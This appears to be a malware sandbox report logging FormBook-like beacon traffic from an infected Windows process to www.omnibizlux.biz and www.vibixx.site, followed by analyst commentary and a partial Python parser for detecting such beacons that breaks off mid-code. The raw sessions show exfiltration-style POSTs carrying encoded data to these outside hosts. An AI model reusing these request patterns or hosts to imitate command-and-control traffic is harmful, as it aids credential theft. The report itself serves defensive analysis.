                                                              Server: nginx/1.26.1
                                                              Date: Tue, 12 Nov 2024 14:32:21 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              22 | 192.168.2.7 | 49998 | 167.172.133.32 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:23.402628899 CET | 633 | OUT | POST /jlqg/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.omnibizlux.biz
                                                              Origin: http://www.omnibizlux.biz
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.omnibizlux.biz/jlqg/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 62 59 4f 45 44 33 58 75 76 49 77 66 5a 51 5a 5a 6c 48 6f 68 42 5a 62 4a 59 6b 34 61 64 73 4e 33 34 4a 45 67 44 5a 2b 2f 46 4f 79 63 39 6c 6a 70 4f 6c 67 48 72 46 70 39 66 53 6b 55 62 68 34 50 49 76 4a 68 68 53 2f 56 45 4d 6d 71 31 56 43 6b 70 6c 33 69 4b 2b 74 69 6d 48 62 53 76 7a 72 53 59 45 37 4e 41 55 73 6e 43 34 37 73 67 5a 5a 64 44 42 44 71 54 77 5a 74 67 7a 4c 47 56 6c 75 49 72 62 62 36 30 75 47 74 32 68 39 48 6b 31 6b 6f 51 73 4c 6b 65 66 55 77 72 75 56 77 31 66 59 67 76 52 6d 72 35 5a 6a 57 33 4b 54 34 32 45 37 52 5a 6b 4e 37 48 36 49 47 6c 4b 61 52 4f 73 63 4f 57 57 49 51 39 62 4e 49 56 76 6e 35 6d 51 66 65 65 56 4e 54 44 4d 67 37 59 52 6b 4f 6c 39 68 43 4a 41 54 42 75 77 3d
                                                              Data Ascii: ZtwlQ=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FOyc9ljpOlgHrFp9fSkUbh4PIvJhhS/VEMmq1VCkpl3iK+timHbSvzrSYE7NAUsnC47sgZZdDBDqTwZtgzLGVluIrbb60uGt2h9Hk1koQsLkefUwruVw1fYgvRmr5ZjW3KT42E7RZkN7H6IGlKaROscOWWIQ9bNIVvn5mQfeeVNTDMg7YRkOl9hCJATBuw=
                                                              Nov 12, 2024 15:32:24.079112053 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx/1.26.1
                                                              Date: Tue, 12 Nov 2024 14:32:23 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              23 | 192.168.2.7 | 49999 | 167.172.133.32 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:25.958107948 CET | 1646 | OUT | POST /jlqg/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.omnibizlux.biz
                                                              Origin: http://www.omnibizlux.biz
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.omnibizlux.biz/jlqg/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 62 59 4f 45 44 33 58 75 76 49 77 66 5a 51 5a 5a 6c 48 6f 68 42 5a 62 4a 59 6b 34 61 64 73 4e 33 34 4a 45 67 44 5a 2b 2f 46 47 79 64 4c 35 6a 72 70 35 67 47 72 46 70 7a 2f 53 6c 55 62 68 6c 50 49 33 7a 68 68 76 49 56 47 45 6d 73 6d 4e 43 30 4e 78 33 35 61 2b 74 74 47 48 57 57 76 7a 69 53 63 59 6e 4e 44 73 73 6e 43 34 37 73 6a 52 5a 4c 68 70 44 6f 54 77 61 67 77 7a 58 43 56 6b 4a 49 72 53 75 36 30 61 57 74 48 42 39 48 45 6c 6b 75 6d 34 4c 35 75 66 61 7a 72 75 7a 77 31 54 35 67 76 4d 64 72 35 45 45 57 31 4b 54 34 7a 64 77 4e 4b 49 37 73 6b 65 4f 50 6d 58 39 65 74 49 39 4d 32 4b 78 5a 61 33 4e 56 31 4c 62 68 6c 39 66 61 49 67 73 4d 77 55 7a 30 70 30 39 65 41 6b 4b 57 61 49 34 43 72 4f 4b 4b 7a 50 79 43 69 6e 71 51 4a 4f 76 4f 34 41 62 67 62 6b 76 69 72 5a 59 63 33 4f 59 6e 33 4a 7a 4d 61 79 63 57 73 58 46 4f 71 6d 73 79 6d 6d 54 45 68 47 47 68 43 62 79 65 6e 54 70 56 48 6f 37 50 33 55 69 55 4c 70 4a 73 6a 30 62 49 46 37 35 73 6f 46 65 76 7a 68 71 6f 41 6b 57 57 41 35 38 6b 4d 33 36 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=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 [TRUNCATED]
                                                              Nov 12, 2024 15:32:26.682861090 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx/1.26.1
                                                              Date: Tue, 12 Nov 2024 14:32:26 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              24 | 192.168.2.7 | 50000 | 167.172.133.32 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:28.499835014 CET | 342 | OUT | GET /jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1stpe7mm3wauuEAY4FKC8z+iht6Qhedx9FkGs7kW/sJA05D+zdwUDUvmBi&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.omnibizlux.biz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:32:29.160559893 CET | 303 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx/1.26.1
                                                              Date: Tue, 12 Nov 2024 14:32:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 153
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              25 | 192.168.2.7 | 50002 | 162.0.211.143 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:34.787796974 CET | 604 | OUT | POST /4xim/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.vibixx.site
                                                              Origin: http://www.vibixx.site
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.vibixx.site/4xim/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 35 59 55 76 49 6d 75 49 42 78 66 66 4e 4b 42 31 65 65 32 36 6d 68 76 61 4c 4b 61 52 79 46 30 4b 45 37 34 45 62 68 67 6b 63 35 2f 7a 66 53 72 50 31 79 39 65 4b 54 52 69 52 6c 34 53 64 56 4e 38 42 63 41 4f 39 56 6f 37 4b 62 4a 34 46 48 45 2b 52 37 54 61 35 38 6a 47 41 49 78 63 4f 54 4a 6c 6e 56 70 45 67 4c 38 67 2b 48 47 45 6f 49 6e 37 45 75 59 6e 67 4b 30 73 45 43 57 41 6e 69 69 46 4d 71 2b 73 61 38 5a 30 33 2f 64 4b 4e 76 55 6b 36 74 57 38 36 2b 61 68 53 6e 61 66 42 36 6e 66 2b 69 32 69 42 76 4c 67 7a 64 54 39 63 62 4b 45 6f 4c 39 54 56 42 76 61 38 59 2b 74 76 77 72 37 78 37 4b 66 68 70 52 6d 59 4b 6b 2b 47 42 39 56 5a 67 3d 3d
                                                              Data Ascii: ZtwlQ=5YUvImuIBxffNKB1ee26mhvaLKaRyF0KE74Ebhgkc5/zfSrP1y9eKTRiRl4SdVN8BcAO9Vo7KbJ4FHE+R7Ta58jGAIxcOTJlnVpEgL8g+HGEoIn7EuYngK0sECWAniiFMq+sa8Z03/dKNvUk6tW86+ahSnafB6nf+i2iBvLgzdT9cbKEoL9TVBva8Y+tvwr7x7KfhpRmYKk+GB9VZg==
                                                              Nov 12, 2024 15:32:35.459532022 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:32:35 GMT
                                                              Server: Apache
                                                              Content-Length: 389
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              26 | 192.168.2.7 | 50003 | 162.0.211.143 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:37.327239990 CET | 624 | OUT | POST /4xim/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.vibixx.site
                                                              Origin: http://www.vibixx.site
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.vibixx.site/4xim/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 35 59 55 76 49 6d 75 49 42 78 66 66 66 61 52 31 62 39 4f 36 71 52 76 5a 56 61 61 52 39 6c 30 57 45 37 30 45 62 67 30 30 41 62 62 7a 66 7a 62 50 32 32 4a 65 48 7a 52 69 65 46 34 58 5a 56 4e 69 42 63 38 38 39 52 30 37 4b 66 5a 34 46 47 30 2b 52 49 37 64 2f 73 6a 45 49 6f 78 65 4b 54 4a 6c 6e 56 70 45 67 4c 5a 37 2b 48 4f 45 6f 34 58 37 45 4d 77 6b 74 71 30 74 48 43 57 41 74 43 6a 4f 4d 71 2f 4c 61 39 46 65 33 38 6c 4b 4e 75 6b 6b 36 63 57 2f 77 2b 61 6a 66 48 62 2b 41 36 79 58 30 6e 61 39 41 4d 66 30 2b 64 36 43 51 4e 4c 6d 79 70 78 2f 4c 51 58 68 34 61 61 62 34 57 32 4f 7a 36 4f 48 73 4c 6c 48 48 39 42 55 4c 54 63 52 50 65 61 45 7a 6c 46 66 2b 30 30 58 77 65 33 58 75 2b 53 6f 75 2f 41 3d
                                                              Data Ascii: ZtwlQ=5YUvImuIBxfffaR1b9O6qRvZVaaR9l0WE70Ebg00AbbzfzbP22JeHzRieF4XZVNiBc889R07KfZ4FG0+RI7d/sjEIoxeKTJlnVpEgLZ7+HOEo4X7EMwktq0tHCWAtCjOMq/La9Fe38lKNukk6cW/w+ajfHb+A6yX0na9AMf0+d6CQNLmypx/LQXh4aab4W2Oz6OHsLlHH9BULTcRPeaEzlFf+00Xwe3Xu+Sou/A=
                                                              Nov 12, 2024 15:32:37.989630938 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:32:37 GMT
                                                              Server: Apache
                                                              Content-Length: 389
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              27 | 192.168.2.7 | 50004 | 162.0.211.143 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:39.873861074 CET | 1637 | OUT | POST /4xim/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.vibixx.site
                                                              Origin: http://www.vibixx.site
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.vibixx.site/4xim/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 35 59 55 76 49 6d 75 49 42 78 66 66 66 61 52 31 62 39 4f 36 71 52 76 5a 56 61 61 52 39 6c 30 57 45 37 30 45 62 67 30 30 41 62 54 7a 66 41 54 50 30 58 4a 65 47 7a 52 69 58 6c 34 57 5a 56 4d 2b 42 63 6c 33 39 52 34 42 4b 5a 46 34 48 6b 4d 2b 58 35 37 64 78 73 6a 45 45 49 78 66 4f 54 49 78 6e 56 35 41 67 4c 4a 37 2b 48 4f 45 6f 36 50 37 4e 2b 59 6b 2b 61 30 73 45 43 57 55 6e 69 6a 6d 4d 71 33 78 61 39 42 6b 30 4e 46 4b 4e 4f 30 6b 68 4f 75 2f 38 2b 61 62 59 48 62 63 41 36 75 59 30 6d 79 48 41 50 44 65 2b 65 61 43 54 73 72 37 75 71 5a 6b 59 77 66 48 6b 35 75 6e 77 51 36 62 2b 38 43 44 6d 38 46 67 41 75 42 74 48 7a 55 72 46 62 36 63 76 47 68 75 6d 6c 34 5a 34 35 69 77 79 2f 43 37 79 37 37 46 33 47 7a 59 33 2b 30 30 50 4f 6c 4b 6c 56 63 59 49 41 58 6d 4f 31 78 6c 59 38 50 6e 4d 68 71 47 54 75 6a 41 54 73 38 2b 74 49 67 49 56 6b 53 77 73 46 52 38 6b 70 78 36 31 7a 64 4c 74 38 6e 52 75 4e 6d 49 73 4b 46 4e 49 6d 2b 6f 6d 50 71 4a 42 49 64 2b 6b 51 66 6f 31 64 61 42 61 36 65 7a 56 6e 41 41 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=[TRUNCATED]
                                                              Nov 12, 2024 15:32:40.572204113 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:32:40 GMT
                                                              Server: Apache
                                                              Content-Length: 389
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              28 | 192.168.2.7 | 50005 | 162.0.211.143 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:42.413814068 CET | 339 | OUT | GET /4xim/?ZX=G2OXK&ZtwlQ=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP20/OCD6R2GxJg22BCsIc2mVLkjoCYHOMomb5GKySOlS/QA9Ktb+YS58Qw HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.vibixx.site
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:32:43.097803116 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:32:43 GMT
                                                              Server: Apache
                                                              Content-Length: 389
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
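The sessions above all share one shape: a single query or form key (ZtwlQ, plus a short ZX=G2OXK tag on the GETs) carrying a base64-looking blob, the same User-Agent and Connection: close on every request, and a 404 from each of the two hosts (www.omnibizlux.biz and www.vibixx.site). The parser below is an added example, not Joe Sandbox code: it reads this flattened session format (timestamp, byte count, direction and HTTP start line run together on one line, then headers, then Data Ascii) and flags a key/User-Agent pair reused against several hosts, which is how FormBook walks its list of real and decoy C2 domains. SAMPLE is a constructed, shortened copy of the lines above; the two-host threshold and the base64-alphabet check are heuristics of this example, not FormBook constants.

```python
"""Parse a Joe Sandbox-style HTTP session dump and flag FormBook-like beacons.

Added example, not Joe Sandbox tooling. Field and header names come from the
session listing in this report; SAMPLE is a constructed, shortened copy of it
(query and form blobs are cut short, so Content-Length no longer matches).
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE = """\
Nov 12, 2024 15:32:28.499835014 CET342OUTGET /jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5nje&ZX=G2OXK HTTP/1.1
Accept: */*
Host: www.omnibizlux.biz
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Nov 12, 2024 15:32:29.160559893 CET303INHTTP/1.1 404 Not Found
Server: nginx/1.26.1
Content-Length: 153
Data Raw: 3c 68 74 6d 6c 3e
Data Ascii: <html>
Nov 12, 2024 15:32:34.787796974 CET604OUTPOST /4xim/ HTTP/1.1
Accept: */*
Host: www.vibixx.site
Origin: http://www.vibixx.site
Connection: close
Content-Length: 218
Content-Type: application/x-www-form-urlencoded
Referer: http://www.vibixx.site/4xim/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Data Raw: 5a 74 77 6c 51 3d
Data Ascii: ZtwlQ=5YUvImuIBxffNKB1ee26mhvaLKaRyF0KE74Ebhgkc5/zfSrP1y9eKTRiRl4SdVN8BcAO9Vo7KbJ4FHE+R7Ta58jG
Nov 12, 2024 15:32:35.459532022 CET533INHTTP/1.1 404 Not Found
Server: Apache
Content-Length: 389
"""

# The dump runs timestamp, byte count, direction and HTTP start line together:
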